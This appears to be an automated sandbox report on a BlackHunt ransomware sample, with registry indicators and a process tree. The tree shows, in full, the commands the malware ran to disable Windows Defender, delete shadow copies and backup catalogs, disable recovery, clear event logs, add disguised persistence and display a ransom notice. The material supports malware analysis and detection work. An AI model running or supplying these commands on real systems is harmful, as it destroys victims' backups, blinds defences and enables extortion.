ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 117 PID 4480 wrote to memory of 1980 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 119 PID 4480 wrote to memory of 1980 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 119 PID 4480 wrote to memory of 3736 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 123 PID 4480 wrote to memory of 3736 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 123 PID 4596 wrote to memory of 396 4596 cmd.exe 124 PID 4596 wrote to memory of 396 4596 cmd.exe 124 PID 3280 wrote to memory of 1644 3280 cmd.exe 122 PID 3280 wrote to memory of 1644 3280 cmd.exe 122 PID 4452 wrote to memory of 1724 4452 cmd.exe 125 PID 4452 wrote to memory of 1724 4452 cmd.exe 125 PID 1560 wrote to memory of 3708 1560 Conhost.exe 127 PID 1560 wrote to memory of 3708 1560 Conhost.exe 127 PID 4424 wrote to memory of 836 4424 cmd.exe 126 PID 4424 wrote to memory of 836 4424 cmd.exe 126 PID 4480 wrote to memory of 4176 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 128 PID 4480 wrote to memory of 4176 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 128 PID 4312 wrote to memory of 4376 4312 cmd.exe 129 PID 4312 wrote to memory of 4376 4312 cmd.exe 129 PID 4480 wrote to memory of 3744 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 131 PID 4480 wrote to memory of 3744 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 131 PID 4900 wrote to memory of 5116 4900 cmd.exe 133 PID 4900 wrote to memory of 5116 4900 cmd.exe 133 PID 1984 wrote to memory of 1256 1984 cmd.exe 135 PID 1984 wrote to memory of 1256 1984 cmd.exe 135 PID 2172 wrote to memory of 4792 2172 cmd.exe 134 PID 2172 wrote to memory of 4792 2172 cmd.exe 134 PID 4480 wrote to memory of 760 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 137 PID 4480 wrote to memory of 760 4480 ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe 137 PID 3736 wrote to memory of 1616 3736 cmd.exe 136 PID 3736 wrote to memory of 1616 3736 cmd.exe 136 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4480 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:1560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2172
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4176
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3744
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:760
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1228
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3248
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4768
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:4184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3160
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F2⤵PID:1396
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe" /F3⤵
- Creates scheduled task(s)
PID:3144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4204
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:4844 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2364
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3528
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4836
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1804
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1560
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2516
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1280
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4392
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3000
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:468
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:14600
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:14296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:14048
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:14272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:10860
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:13352
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:6340
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6580
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:14812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6540
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:14212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:14872
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:14700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:10144
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:13972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:14876
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:14172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:14488
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:14036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:14584
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:11672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10856
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:15020
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:15280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14860
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:14924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:14840
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:14932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7284
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:15016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1352
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:14628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:15060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:15296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:15272
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:10384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:12412 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5868
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ece542531db5268ca1aa5a6439e9f942995353a0fc301391e18134b7e5fb3fa0.exe"2⤵PID:15112
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:7572
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
